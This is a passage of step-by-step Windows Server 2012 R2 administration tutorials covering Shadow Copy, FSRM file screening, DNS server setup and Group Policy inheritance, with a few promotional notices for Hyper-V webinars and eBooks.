This opens the Add Roles and Features Wizard. Go to Server Selection and select the server on which you want to install the File and Storage Services:

windows-2012-shadow-copy-setup-generate-file-folder-02

Figure 2. Selecting our Windows 2012 R2 Server from the server pool

Click on Next and select Server Roles. Expand the File and Storage Services and the File and iSCSI Services. Check that tick marks are visible against all the services. Click on those missing the tick marks:

windows-2012-shadow-copy-setup-generate-file-folder-03

Figure 3. Selecting File & Storage Services, plus iSCSI Services for installation

Click Next four times until you arrive at Confirmation:

windows-2012-shadow-copy-setup-generate-file-folder-04

Figure 4. Add roles and Features – Final confirmation Window

Click on Install to enable all the File and Storage Services. Once the server has completed the installation, click on Close.

Enabling The Shadow Copy Feature

After having confirmed that the server has all File and Storage Services enabled, go to the server desktop and open File Explorer. You can do this by pressing the WINDOWS+E keys together on your keyboard or by clicking on the fourth icon from the left on the bottom toolbar of the Windows Server 2012 R2 desktop:

windows-2012-shadow-copy-setup-generate-file-folder-05 

Figure 5. Opening Windows File Explorer

We will enable shadow copy for the volume C:\. Within this volume, we have our folder C:\Users\Chris_Partsenidis_Share for which we would like to ensure shadow copy is enabled:

windows-2012-shadow-copy-setup-generate-file-folder-06

Figure 6. Location of the folder we will be using as a Shadow-Copy example

Right-click on the Local Disk or volume C:\ (or any other volume depending on your requirements) and select Configure shadow copies from the drop-down menu:

windows-2012-shadow-copy-setup-generate-file-folder-07

Figure 7. How to enable Shadow Copy for a Windows Volume

When the UAC confirmation dialog box opens, confirm with Yes. This opens the screen for Shadow Copies. Under Select a volume, click to select the volume C:\ from the list or any other volume for which you want to turn on shadow copies. Now, click on Enable.

A confirmation dialog will appear to Enable Shadow Copies along with a warning about file servers with high I/O loads:

windows-2012-shadow-copy-setup-generate-file-folder-08

Figure 8. Enable Shadow Copy confirmation window

Click on Yes to complete the process. You will be returned to the Shadow Copies screen and under Shadow copies of the selected volume, you can see the newly created Shadow Copy for volume C:\:

windows-2012-shadow-copy-setup-generate-file-folder-09 

Figure 9. Viewing the status of Shadow Copy for our Volume

Click on Settings to open the Settings dialog. In the Settings dialog, under Maximum size, you can select either No limit for the space reserved or set a limit for it by selecting Use limit. Note that as stated in the dialog box, a minimum limit of 300MB is necessary for the space reserved for shadow copies:

windows-2012-shadow-copy-setup-generate-file-folder-10 

Figure 10. Setting the maximum size to be used by Shadow Copy for our volume

Next, you can either go with the default schedule of two snapshots of shadow copies every day, or define your own by clicking on Schedule to open the Schedule dialog:

windows-2012-shadow-copy-setup-generate-file-folder-11

Figure 11. Configuring the Shadow Copy Schedule

In the Schedule dialog, tweak the settings to fit your environment in the best possible way and click on Ok to return to the Shadow Copies dialog.

To create a current snapshot, click on Create Now and under Shadow Copies of Selected Volume, a date and time entry will appear, signifying that the server has created a shadow copy snapshot. Click on Ok to close the dialog.
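Shadow copies can also be created and inspected from an elevated command prompt using the built-in vssadmin utility available on Windows Server editions. The commands below are an optional alternative to the Create Now button, using C: as our example volume:

C:\> vssadmin create shadow /for=C:
C:\> vssadmin list shadows /for=C: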

Accessing Shadow Copies

Users can access the shared volume/folders from either their local server or from a client PC over the network. They can see the previous versions (shadow copies) of their folders and files from the Properties of the shared folder or file.

Go to File Explorer and click on a shared volume - volume C:\ in our case. Select the shared folder within the shared volume – which, in our example, is C:\Users\Chris_Partsenidis. Right-click on the shared folder and go to Restore previous versions:

windows-2012-shadow-copy-setup-generate-file-folder-12

Figure 12. Viewing the Shadow Copy status of our shared folder

This opens the Properties dialog for the shared folder - C:\Users\Chris_Partsenidis. The list under Folder versions contains all the shadow copies created for this shared folder. From this list, you can select a specific previous version (shadow copy) and choose to Open, Copy or Restore it.

windows-2012-shadow-copy-setup-generate-file-folder-13

Figure 13. Accessing previous versions of our shared folder

After you have completed your work, click on Ok or Cancel to exit the dialog box.

This article explained the purpose of the Windows Shadow Copy service and how to enable and configure Shadow Copy for a Windows volume. We also saw how administrators and users can access previous versions of folders/files located on a shadow-copy-enabled volume.


Windows Server 2012 File Server Resource Manager (FSRM) Installation & Configuration - Block Saving Of Specific File Types on Windows Server

Windows Server 2008 was the first to carry FSRM, or File Server Resource Manager, which allowed administrators to define the file types that users could save to file servers. Windows FSRM has been a part of all succeeding Windows Server releases, and administrators can block defined file types from being uploaded to a specific folder or to an entire volume on the server.

Before you can begin blocking file extensions, you may need to install and configure FSRM on your Windows Server 2012 R2. Installation of FSRM can be achieved through the Server Manager GUI or by using the PowerShell console.

This article will examine the installation of FSRM using both methods, Server Manager GUI and Windows Server PowerShell console, while providing all necessary information to ensure a successful deployment and configuration of FSRM services.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Installing FSRM On Server 2012 Using The Server Manager GUI

Assuming you are logged in as the administrator, start with the Server Manager – click on the second icon from left on the bottom toolbar on the desktop as shown below:

windows-2012-fsrm-installation-configuration-block-defined-file-types-1

Figure 1. Launching the Server Manager Dashboard

This brings up the Server Manager Dashboard. Proceed to the top right hand corner and click on Manage, then click on Add Roles and Features.

windows-2012-fsrm-installation-configuration-block-defined-file-types-2
Figure 2. Opening Add Roles and Features console

This opens the Add Roles and Features Wizard, where you need to click on Server Selection. Depending on how many servers you are currently managing, the right hand side will show one or multiple servers in the pool. Select the file server on which you want to install FSRM, and click on Next to proceed.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-3

Figure 3. Selecting a Server to add the FSRM role

The next screen shows the server roles that you can install on the selected server. On the right hand side, locate File and Storage Services and expand it. Locate the File and iSCSI services and expand it. Now, locate the File Server Resource Manager entry.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-4
Figure 4. Selecting the File Server Resource Manager role for installation

Click on the check box in front of the entry File Server Resource Manager. This will open up the confirmation dialog box for the additional features that you must first install before installing FSRM.

windows-2012-fsrm-installation-configuration-block-defined-file-types-5 
Figure 5. Confirming the installation of additional role services required for FSRM

Click on Add Features and you are all set to install FSRM, as the check box for File Server Resource Manager now has a tick mark (shown below).

windows-2012-fsrm-installation-configuration-block-defined-file-types-6

Figure 6. Back to the Server Role installation – Confirming FSRM Role Selection

Clicking on Next allows you to Select one or more features to install on the selected server. We don’t need to add anything here at this stage, so click Next to go to the next step.

This brings up a screen asking you to Confirm installation selections. This is the stage where you have the last chance to go back and make any changes, before the actual installation starts.

windows-2012-fsrm-installation-configuration-block-defined-file-types-7 
Figure 7. Confirm installation selections

Click on Install to allow the installation to commence; the progress will be shown on the progress bar on the Results screen. Once completed, you will see Installation successful on … under the progress bar.

windows-2012-fsrm-installation-configuration-block-defined-file-types-8 
Figure 8. Completion of FSRM role installation

Click on Close to exit the process.

To check if the FSRM has actually started running, go to the Server Manager Dashboard and click on File and Storage Services on the left hand side of the screen.

windows-2012-fsrm-installation-configuration-block-defined-file-types-9 
Figure 9. Server Manager Dashboard

The Dashboard now shows all the servers running under File and Storage Services. Go down to Services and you will see FSRM running with an Automatic startup type.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-10

Figure 10. File and Storage Services – Confirming FSRM Service

Installing FSRM On Server 2012 Using The PowerShell Console

This is an easier and faster process compared to the GUI method.

To invoke the PowerShell, click the third icon from left on the bottom toolbar on the desktop.

windows-2012-fsrm-installation-configuration-block-defined-file-types-11 
Figure 11. Launching Windows PowerShell

 This will open up a console with an administrative level command prompt. At the command prompt, type:

C:\Users\Administrator> Add-WindowsFeature –Name FS-Resource-Manager –IncludeManagementTools

windows-2012-fsrm-installation-configuration-block-defined-file-types-12

Figure 12.  Executing PowerShell command to install FSRM

A successful installation will be indicated as True under the Success column, as shown above.

FREE Hyper-V & VMware Backup:  Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Configuring File Screening

Invoke FSRM from the Tools menu on the top right hand corner of the Server Manager Dashboard.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-13

Figure 13. Running the File Server Resource Manager component

The File Server Resource Manager screen opens up. On the left panel, expand the File Screening Management and go to File Groups. The central panel shows the File Groups, the Include Files and the Exclude Files in three columns.

Under the column File Groups, you will find file types conveniently grouped together. The column Include Files lists all file extensions that are included in the specific file group. For a new server, the column Exclude Files is typically empty.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-14

Figure 14 – File Groups, Include File and Exclude Files

On the left panel, go to File Screen Templates and click on it. The central panel shows predefined rules that apply to folders or volumes.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-15

Figure 15. File Server Resource Manager - File Screen Templates

For instance, double-click on Block Image Files in the central panel. This opens up the File Screen Template Properties for Block Image Files. Here you can define all the actions that the server will take when it encounters a situation where a user is trying to save a file belonging to a blocked file group.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-16

Figure 16. FSRM - File Screen Template Properties for Block Image Files

You can choose to screen the specified file type either actively or passively. Active screening prevents users from saving files in the specified file group. With passive screening, users are not prevented from saving the files, but the administrator can monitor their actions.

The server can take up to four basic actions when it encounters an attempt to save a forbidden file: it can send an Email message to the administrator, create an entry in the Event Log, run a specified Command or Script, and/or generate a Report. You can set up the details for each action on the individual tabs. When completed, exit by clicking on OK or Cancel.

To edit the existing template or to create a new one based on the chosen template, go to the File Screen Templates and in the central panel, right-click on the predefined template you would like to edit. From the Actions menu on the right panel, you can either Create File Screen Template or Edit Template Properties.

windows-2012-fsrm-installation-configuration-block-defined-file-types-17 
Figure 17. FSRM – Creating or editing a File Screen Template

Clicking on Create File Screen Template opens a dialog where you can click on Browse to select a folder or volume to which the new rule will be applied. Under How do you want to configure file screen properties?, you can either derive the properties from an existing template or define custom ones. Click on Create to allow the new file screen rule to appear in the central panel.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-18

Figure 18. FSRM - Creating a File Screen

Creating Exceptions

Exceptions are useful when you want to allow a blocked file type to be saved in a specific location. Go to the left panel of the FSRM screen and right-click on File Screens.

windows-2012-fsrm-installation-configuration-block-defined-file-types-19

Figure 19. FSRM – Creating a File Screen Exception

From the menu on the right panel, click on Create File Screen Exception. In the dialog that opens, click on Browse to select the folder or volume to which the new rule will be applied, and select the group you would like to exclude under File groups. Click OK to complete the process.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-20

Figure 20. FSRM – File Screen Exception settings and options
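The same exception can be scripted with the New-FsrmFileScreenException cmdlet; the path below is a hypothetical subfolder where the otherwise blocked file group should be allowed:

# Allow Image Files to be saved in a specific subfolder despite the parent file screen
New-FsrmFileScreenException -Path "D:\Shares\Users\Marketing" -IncludeGroup "Image Files"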

Summary

This article showed how we can use the Windows Server File Server Resource Manager (FSRM) to block file types and extensions from being uploaded or saved to a directory or volume on a Windows 2012 R2 server. We explained how to perform the installation of FSRM via the GUI interface and PowerShell, and covered the creation and editing of File Screen Templates used to block or permit the saving of specific files.


New Upcoming Features in Hyper-V vNext - Free Training From Leading Hyper-V Experts – Limited Seats!

With the release of Hyper-V vNext just around the corner, Altaro has organized a Free webinar that will take you right into the new Hyper-V vNext release. Microsoft Hyper-V MVP, Aidan Finn and Microsoft Sr. Technical Evangelist Rick Claus will take you through the new features, improvements, changes and much more, and will be available to answer any questions you might have.

Don't miss this opportunity: stay ahead of the rest, learn about the new Hyper-V vNext features and have your questions answered by Microsoft Hyper-V experts!

Note: This webinar date has passed; however, the recording and all material presented are freely available via the registration link below:

Click here to view this Free Webinar.

windows-virtualization-hyper-v-vnext-features-webinar-1


Free Webinar & eBook on Microsoft Licensing for Virtual Environments (Hyper-V)

hyper-v-altaro-free-webinar-ebook-1
Microsoft licensing for virtual environments can become a very complicated topic, especially with all the misconceptions and false information out there. Thankfully Altaro, the leader in Hyper-V backup solutions, has gathered Hyper-V MVP experts Thomas Maurer and Andrew Syrewicze to walk us through the theory and present us with real licensing scenarios to help us gain a solid understanding of Microsoft licensing in virtual environments.

The Hyper-V experts will also be available to answer all questions raised during the free webinar. Registration and participation for this webinar is completely free.

Webinar Details: This webinar has passed; however, a recorded version is available at the URL below, along with all necessary resources.

As a bonus, a free eBook written by Hyper-V expert Eric Siron, covering Licensing Microsoft Server in a Virtual Environment, is now available as a free download.

To download your free eBook copy and register for the Free Webinar click here.

 


Free Hyper-V eBook - Create, Manage and Troubleshoot Your Hyper-V VMs. Free PowerShell Scripts Included!

hyper-v-altaro-cookbook-1
With the introduction of Hyper-V on the Windows Server platform, virtualization has quickly become the de facto standard for all companies seeking to consolidate their server infrastructure. While we've covered a number of virtualization topics, including Hyper-V installation, management and configuration, Hyper-V backups, best practices and much more, this eBook offered by Altaro is all about getting the most out of your Hyper-V infrastructure.

The Altaro PowerShell Hyper-V Cookbook, written by Jeffery Hicks, a well-known PowerShell MVP, covers a number of very important topics that are guaranteed to help you discover more about your Hyper-V server(s) and help you make the most out of what they can offer.

Topics covered include:

  • Hyper-V Cmdlets - Understand what they are, how to use them and create a Hyper-V virtual machine
  • Discover and display information about your VMs and Hyper-V host
  • Easily Identify VHD/VHDX files
  • Mount ISO files
  • Delete obsolete snapshots and query Hyper-V event logs
  • and much more!

 Don't miss this opportunity and grab your free copy for a limited time!

 BONUS: All PowerShell scripts are included FREE in a separate ZIP file!


How to Install and Configure Windows 2012 DNS Server Role

Our previous article covered an introduction to the Domain Name System (DNS) and explained the importance of the DNS Server role within the network infrastructure, especially when Active Directory is involved. This article will cover the installation of the DNS server role in Windows 2012 Server and will include all necessary information for the successful deployment and configuration of the DNS service. Interested users can also read our DNS articles covering the Linux operating system or our analysis of the DNS Protocol under the Network Protocols section.

The DNS Server can be installed during the deployment of Active Directory Services or as a stand-alone service on any Windows server. We'll be covering both options in this article.


DNS Server Installation via Active Directory Services Deployment

Administrators who are in the process of deploying Active Directory Services will be prompted to install the DNS server role during the AD installation process, as shown in figure 1 below:

windows-2012-dns-server-installation-configuration-1Figure 1. DNS Installation via Active Directory Services Deployment

Alternatively, administrators can choose to install the DNS server role later on, or even on a different server, as shown next. We decided to install the DNS Server role on the Active Directory Domain Controller server.

DNS Server Installation on Domain Controller or Stand Alone Server

To begin the installation, open Server Manager and click Add Roles and Features. Click Next on the Before you begin page. Now choose Role-based or feature-based installation and click Next:

Figure 2. Selecting Role-based or feature-based installation

In the next screen, choose the Select a server from this server pool option and select the server for which the DNS server role is intended. Once selected, click the Next button as shown in figure 3:

windows-2012-dns-server-installation-configuration-3Figure 3. Selecting the Server that will host the DNS server role

 The next screen allows us to choose the role(s) that will be installed. Select the DNS server role from the list and click Next to continue:

windows-2012-dns-server-installation-configuration-4 Figure 4. Selecting the DNS Server Role for installation

The next screen is the Features page, where you can safely click Next without selecting any feature from the list.

The next screen provides information on the DNS Server role that's about to be installed. Read the DNS Server information and click Next:

windows-2012-dns-server-installation-configuration-5Figure 5. DNS Information

The final screen is a confirmation of the roles and services to be installed. When ready, click on the Install button for the installation to begin:

windows-2012-dns-server-installation-configuration-6Figure 6. Confirm Installation Selections

The Wizard will provide an update on the installation progress as shown below. Once the installation has completed, click the Close button:

windows-2012-dns-server-installation-configuration-7Figure 7. Installation Progress
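For reference, the same role can also be added from an elevated PowerShell prompt using the standard Server Manager cmdlets - a quick sketch:

# Install the DNS Server role together with its management tools (DNS Manager console)
Install-WindowsFeature DNS -IncludeManagementTools

# Confirm the role now shows as Installed
Get-WindowsFeature DNS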

 


Configuring Properties of DNS Server

Upon successful installation of the DNS server role, you can open the DNS Manager to configure the DNS Server. Once DNS Manager is open, expand the server; in our example the server is FW-DC1. Right below the server we can see the Forward Lookup Zones and Reverse Lookup Zones listed. Because this is an Active Directory-integrated DNS server, the firewall.local and _msdcs.firewall.local zones are created by default, as shown in figure 8:

windows-2012-dns-server-installation-configuration-8Figure 8. DNS Manager & DNS Zones

To configure the DNS server properties, right-click the DNS server and click Properties. Next, select the Forwarders tab. Click Edit and add the IP address of the DNS server that this server will query when it is unable to resolve a name itself. This is usually the ISP's DNS server or any public DNS server, such as Google's 8.8.8.8 or Level 3's 4.2.2.2. There is another feature called root hints which does a similar job (it queries the Internet's root DNS servers), but we prefer using forwarders pointed at public DNS servers:

windows-2012-dns-server-installation-configuration-9Figure 9. DNS Forwarders – Add your ISP or Public DNS Servers here
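The same forwarders can be configured from PowerShell using the DnsServer module that is installed alongside the role. A small sketch, using Google's public resolver as an example:

# Add a forwarder (Google's public DNS used here as an example)
Add-DnsServerForwarder -IPAddress 8.8.8.8

# Review the current forwarder configuration
Get-DnsServerForwarder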

Next, click on the Advanced tab. Here you can configure advanced features such as round robin (in case of multiple DNS servers), scavenging period and so on. Scavenging is a feature often used as it deletes the stale or inactive DNS records after the configured period, set to 7 days in our example:

windows-2012-dns-server-installation-configuration-10 Figure 10. Advanced Options - Scavenging

Next up is the Root Hints tab. Here, you will see a list of the 13 root servers. These servers are queried when our DNS server is unable to resolve a request for its clients and no DNS forwarders are configured. As we can see, DNS forwarding is pretty much an optional but recommended configuration. It is highly unlikely administrators will ever need to change the Root Hints servers:

windows-2012-dns-server-installation-configuration-11Figure 11. Root Hints

Our next tab, Monitoring, is also worth exploring. Here you can perform a DNS lookup test that will run queries against your newly installed DNS server. You can also configure automated tests that will run at a configured time interval to ensure the DNS server is operating correctly:

windows-2012-dns-server-installation-configuration-12Figure 12. Monitoring Tab – Configuring Automated DNS Test Queries

Next, click on the Event Logging tab. Here you can configure options to log DNS events. By default, all events are logged, but you can choose to log only errors, only warnings, a combination of errors and warnings, or turn logging off entirely (No events option):

windows-2012-dns-server-installation-configuration-13Figure 13. Event Logging

When Event Logging is enabled, you can view any type of logged events in the Event Viewer (Administrative Tools) console.

The Debug Logging tab is next up. Debug Logging allows us to capture to a log file any packets sent and received by the DNS server. Think of it as Wireshark for your DNS server. You can log DNS packets and filter them by direction, protocol, IP address, and other parameters as shown below. You can also set the log file location and the maximum file size in bytes:

windows-2012-dns-server-installation-configuration-14Figure 14. Debug Logging – Capturing DNS Packets & Configuring DNS Debugging

Zone – Domain Properties

Each Zone or Domain has a specific set of properties which can be configured as shown in figure 15 below. In our example, firewall.local is an Active Directory-integrated zone as indicated by the Type field. Furthermore the zone's status is shown at the top area of the window – our zone is currently in the running state and can be paused by simply clicking on the pause button on the right:

windows-2012-dns-server-installation-configuration-15Figure 15. Zone Properties

Right below, you can change the zone type to primary, secondary or stub. You can also configure whether dynamic updates must be secure. Similarly, you can configure aging and scavenging properties to automate the cleanup of stale records.

The Start of Authority (SOA) tab provides access to a number of important settings for our DNS server. Here you can see the serial number, which increments automatically every time there is a change in the DNS zone. The serial number is used by other DNS servers to identify whether any changes have been made since the last time they replicated the zone. The Primary server field indicates the primary server on which the zone or domain is hosted. If there are multiple DNS servers in the network, we can easily select a different server from here:

windows-2012-dns-server-installation-configuration-16Figure 16. Start Of Authority Settings

In addition, you can also configure the TTL (Time to Live) value, refresh, retry intervals and expiry time of the record.

Next is the Name Servers tab. In this tab, you can add the list of name servers that host this zone:

windows-2012-dns-server-installation-configuration-17Figure 17. DNS Name Servers

Finally, the Zone Transfers tab. In this tab, you can add DNS servers which can copy zone information (zone transfer) from this DNS server:

windows-2012-dns-server-installation-configuration-18Figure 18. Zone Transfers

Once all configuration changes have been completed, click Apply and your zone is good to go.
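If you manage several zones, the same properties can also be reviewed and adjusted from PowerShell. A brief sketch, assuming the firewall.local zone used in this article:

# Display the zone and its type (primary, AD-integrated, etc.)
Get-DnsServerZone -Name "firewall.local"

# Enable aging so that stale records become candidates for scavenging
Set-DnsServerZoneAging -Name "firewall.local" -Aging $true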


This article showed how to install and configure Windows 2012 DNS Server Role and explained all DNS Server options available for configuration.


Introduction to Windows DNS – The Importance of DNS for Active Directory Services

windows-2012-dns-active-directory-importance-1The Domain Name System (DNS) is perhaps one of the most important services for Active Directory. DNS provides name resolution services for Active Directory, resolving hostnames, URLs and Fully Qualified Domain Names (FQDN) into IP addresses. The DNS service uses UDP port 53, falling back to TCP port 53 for zone transfers and for responses that are too large to fit in a single UDP packet.

In-Depth information and analysis of the DNS protocol structure can be found at our DNS Protocol Analysis article.


How DNS Resolution Works

When installed on a Windows Server, DNS uses a database stored in Active Directory or in a file and contains lists of domain names and corresponding IP addresses. When a client requests a website by typing a domain (URL) inside the web browser, the very first thing the browser does is to resolve the domain to an IP address.

To resolve the IP address, the browser checks various places. First, it checks the local cache of the computer; if there is no entry for the domain in question, it then checks the local hosts file (C:\windows\system32\drivers\etc\hosts), and if no record is found there either, it finally queries the DNS server.

The DNS server returns the IP address to the client and the browser forms the http request which is sent to the destination web server.

The above series of events describes a typical HTTP request to a site on the Internet. The same series of events is usually followed when requesting access to resources within the local network and Active Directory, the only difference being that the local DNS server is aware of all internal hosts and domains.
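You can observe this resolution process yourself from any Windows 8 or Windows Server 2012 machine using the DnsClient PowerShell module; the domain queried below is just an example:

PS C:\> Resolve-DnsName www.firewall.cx -Type A
PS C:\> Get-DnsClientCache

Resolve-DnsName performs the query against the configured DNS server, while Get-DnsClientCache shows the local resolver cache that is consulted before the DNS server is queried.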

A DNS Server can be configured on any server running the Windows Server 2012 operating system. The DNS server can be Active Directory integrated or not. A few important tasks a DNS server in Windows Server 2012 is used for are:

  • Resolve host names to their corresponding IP address (DNS)
  • Resolve IP address to their corresponding host name (Reverse DNS)
  • Locate Global Catalog Servers and Domain Controllers
  • Locate Mail Servers

DNS Zones & Records

A DNS Server contains Forward Lookup Zones and Reverse Lookup Zones. Each zone contains different types of resource records. A Forward Lookup Zone maps a host name to an IP address, while a Reverse Lookup Zone maps an IP address back to a host name. A DNS zone is stored either in a file or in the Active Directory database. When a zone is stored in a file, only the primary copy is writable and any secondary copies are read-only; a zone stored in the Active Directory database can be written to on every Domain Controller that hosts it. Resource records specify the type of resource.

Resource records in Forward Lookup Zone include:

Resource Type          Record
Host Name              A
Mail Exchange          MX
Service                SRV
Start of Authority     SOA
Alias                  CNAME
Name Server            NS

Table 1. Forward Lookup Zone Resource Record Types

Similarly, resource records in Reverse Lookup Zone include:

Resource Type          Record
Pointer                PTR
Start of Authority     SOA
Name Server            NS

Table 2. Reverse Lookup Zone Resource Record Types


Types Of DNS Zone

There are four DNS zone types:

Primary Zones: The server hosting a primary zone is the master DNS server for that zone and stores the master copy of the zone data in AD DS or in a local file. This zone is the primary source of information about the zone.

Secondary Zones: The server hosting a secondary zone holds a read-only copy of the zone data in a local file. Secondary zones cannot be stored in AD DS. The server that hosts a secondary zone retrieves the DNS information from another DNS server where the original zone is hosted and must have network access to that remote DNS server.

Stub Zones: A Stub Zone contains only those resource records that are required to identify the authoritative DNS servers of that zone. A Stub Zone contains only SOA, NS and A type resource records which are required to identify the authoritative name server.

Active Directory-Integrated Zones: An Active Directory-Integrated Zone stores zone data in Active Directory. The DNS server can use the Active Directory replication model to replicate DNS changes between Domain Controllers, which allows for multiple writable copies of the zone in the network. Similarly, secure dynamic updates are also supported, which means that computers that have joined the domain can register their own DNS records in the DNS server.
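For reference, each of these zone types can also be created from PowerShell with the DnsServer module. The sketch below uses example zone names and IP addresses that you would replace with your own:

# Active Directory-integrated primary zone, replicated to all DCs in the domain
Add-DnsServerPrimaryZone -Name "firewall.local" -ReplicationScope "Domain"

# File-backed secondary zone, pulling its data from a master DNS server
Add-DnsServerSecondaryZone -Name "example.local" -ZoneFile "example.local.dns" -MasterServers 192.168.1.1

# Stub zone pointing at the authoritative servers of another zone
Add-DnsServerStubZone -Name "partner.local" -ZoneFile "partner.local.dns" -MasterServers 192.168.1.50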

This article provided information about DNS services and a brief description of the DNS resolution process. We also explained the importance of DNS services in Active Directory and looked at the four different types of DNS zones. The next article will show how to install the DNS Server role in Windows Server 2012.


Windows Server Group Policy Link Enforcement, Inheritance and Block Inheritance

windows-2012-group-policy-enforcement-4Our previous article explained what Group Policy Objects (GPO) are and showed how group policies can be configured to help control computers and users within an Active Directory domain. This article takes a look at Group Policy Enforcement, Inheritance and Block Inheritance throughout our Active Directory structure. Users seeking more technical articles on Windows 2012 Server can visit our dedicated Windows 2012 Server section.

Group Policy Enforcement, Inheritance and Block Inheritance provide administrators with the flexibility needed for a successful Group Policy deployment within Active Directory, especially in large organizations where multiple GPOs are applied at different levels of the Active Directory hierarchy, causing some GPOs to accidentally override others.

Thankfully Active Directory provides a simple way for granular control of GPOs:

 


 

Group Policy Object Inheritance

GPOs can be linked at the Site, Domain, OU and child OU levels. By default, group policy settings that are linked to parent objects are inherited by the child objects in the Active Directory hierarchy. For example, the Default Domain Policy is linked to the domain and is inherited by all child objects of the domain hierarchy.

GPO inheritance lets administrators set a common set of policies at the domain or site level and configure more specific policies at the OU level. GPOs inherited from parent objects are processed before GPOs linked to the object itself.

 

As shown in the figure below, the Default Domain Policy GPO with precedence 2 will be processed first, because the Default Domain Policy is applied at the domain level (firewall.local), whereas the WallPaper GPO is applied at the organizational unit level:

windows-2012-group-policy-enforcement-1Figure 1. Group Policy Inheritance

Block Inheritance

Just as GPOs are inherited by default, inheritance can also be blocked if required, using the Block Inheritance option. When Block Inheritance is enabled on a container, group policy settings from parent objects are no longer inherited. This setting is mostly used when the OU contains users or computers that require different settings than those applied at the domain level.


As shown in the figure below, to configure blocking of GPO inheritance, right-click the OU container and select the Block Inheritance option from the list:

Figure 2. GPO Block Inheritance

Enforced (No Override)

This option prevents a GPO from being overridden by other GPOs. For example, if you apply a GPO at the domain level and check the Enforced option, the policy will be enforced on all child objects in Active Directory and will take precedence over GPOs linked to child containers, even if a child GPO configures the same setting with a different value. In previous Windows Server versions, the GPO Enforced option used to be called No Override.

To enable the GPO Enforced option, right-click on a particular GPO and click on the Enforced option:

windows-2012-group-policy-enforcement-3Figure 3. Enforcing a GPO
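Both options can also be set from PowerShell with the GroupPolicy module. The sketch below uses the firewall.local domain and an example OU distinguished name; adjust the names to your own structure:

# Block inheritance on an OU (example distinguished name)
Set-GPInheritance -Target "OU=FW Users,DC=firewall,DC=local" -IsBlocked Yes

# Enforce an existing GPO link at the domain level
Set-GPLink -Name "Default Domain Policy" -Target "DC=firewall,DC=local" -Enforced Yes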

This article explained the importance of GPO inheritance and how it can be enforced or blocked via Group Policy Enforcement, Inheritance and Block Inheritance throughout the Active Directory. For more information on Group Policies and how they are created or applied, refer to our article Configuring Windows 2012 Active Directory Group Policies or visit our Windows 2012 Server Section.




Understanding, Creating, Configuring & Applying Windows Server 2012 Active Directory Group Policies

This article explains what Group Policies are and shows how to configure Windows Server 2012 Active Directory Group Policies. Our next article will cover how to properly enforce Group Policies (Group Policy Link Enforcement, Inheritance and Block Inheritance) on computers and users that are part of the company's Active Directory.


Before we dive into Group Policy configuration, let's explain what exactly Group Policies are and how they can help an administrator control its users and computers.

A Group Policy is a computer or user setting that can be configured by administrators to apply various computer-specific or user-specific registry settings to computers that have joined the domain (Active Directory). A simple example of a group policy is the user password expiration policy, which forces users to change their password on a regular basis. Another example of a group policy would be the enforcement of a specific desktop background picture on every workstation, or restricting users from accessing their Local Network Connection properties so they cannot change their IP address.

A Group Policy Object (GPO) contains one or more group policy settings that can be applied to domain computers, users, or both. GPO objects are stored in active directory. You can open and configure GPO objects by using the GPMC (Group Policy Management Console) in Windows Server 2012:

windows-2012-group-policies-1 Figure 1. GPO Objects

Group Policy Settings are the actual configuration settings that can be applied to a domain computer or user. Most of the settings have three states, Enabled, Disabled and Not Configured. Group Policy Management Editor provides access to hundreds of computer and user settings that can be applied to make many system changes to the desktop and server environment.

Group Policy Settings

Group Policy Settings are divided into Computer Settings and User Settings. Computer Settings are applied when the system starts and modify the HKEY_LOCAL_MACHINE hive of the registry. User Settings are applied when a user logs in to the computer and modify the HKEY_CURRENT_USER hive.

windows-2012-group-policies-2Figure 2. Group Policy Settings

Computer Settings and User Settings both have policies and preferences.

These policies are:

Software Settings: Software can be deployed to users or computers by the administrator. Software deployed to users will be available only to those specific users, whereas software deployed to a computer will be available to any user that logs on to the specific computer where the GPO is applied.

Windows Settings: Windows settings can be applied to a user or a computer in order to modify the windows environment. Examples are: password policies, firewall policy, account lockout policy, scripts and so on.  

Administrative Templates: Contains a number of user and computer settings that can be applied to control the windows environment of users or computers. For example, specifying the desktop wallpaper, disabling access to non-essential areas of the computers (e.g Network desktop icon, control panel etc), folder redirection and many more.

Preferences are a Group Policy extension that performs work which would otherwise require scripts. Preferences are used for both users and computers. You can use preferences to map network drives for users, map printers, configure internet options and more.

Next, let’s take a look at how we can create and apply a Group Policy.


Creating & Applying Group Policy Objects

By default, GPOs can be created and applied by the Domain Admins, Enterprise Admins and Group Policy Creator Owners groups. After creating a GPO, you can apply or link it to sites, domains or Organizational Units (OUs); however, you cannot link a GPO directly to users, groups or computers. GPOs are processed in the following order:

  1. Local Group Policy: Every Windows operating system has a local group policy installed by default, so the computer's local group policy is applied first.
  2. Site GPO: GPOs linked to the Site are processed next. By default, there is no site-level group policy configured.
  3. Domain GPO: Next, GPOs configured at the domain level are processed. By default, a GPO named Default Domain Policy is applied at the domain level and applies to all objects in the domain. If there is a policy conflict between domain- and site-level GPOs, the domain-level GPO takes precedence.
  4. Organizational Unit GPO: Finally, GPOs configured at the OU level are applied. If there is any conflict with previously applied GPOs, the OU GPO takes precedence over the Domain, Site and Local Group Policy.

Let’s now take a look at a scenario to apply a group policy to domain joined computers to change the desktop background. We have a domain controller named FW-DC01 and two clients FW-CL1 and FW-CL2 as shown in the diagram below. The goal here is to set the desktop wallpaper for these two clients from a group policy:

windows-2012-group-policies-3Figure 3. GPO Scenario

In our earlier articles we showed how Windows 8 / Windows 8.1 clients join an Active Directory domain; FW-CL1 and FW-CL2 are workstations that have previously joined our Active Directory domain. We have two users, MJackson and PWall, in the FW Users OU.

Open the Group Policy Management Console (GPMC) by going to Server Manager > Tools and selecting Group Policy Management, as shown below:

windows-2012-group-policies-4Figure 4. Open GPMC

As the GPMC opens up, you will see the tree hierarchy of the domain. Now expand the domain, firewall.local in our case, and you will see the FW Users OU which is where our users reside. From here, right-click this OU and select the first option Create a GPO in this domain and Link it here:

windows-2012-group-policies-5Figure 5. Select FW Users and Create a GPO

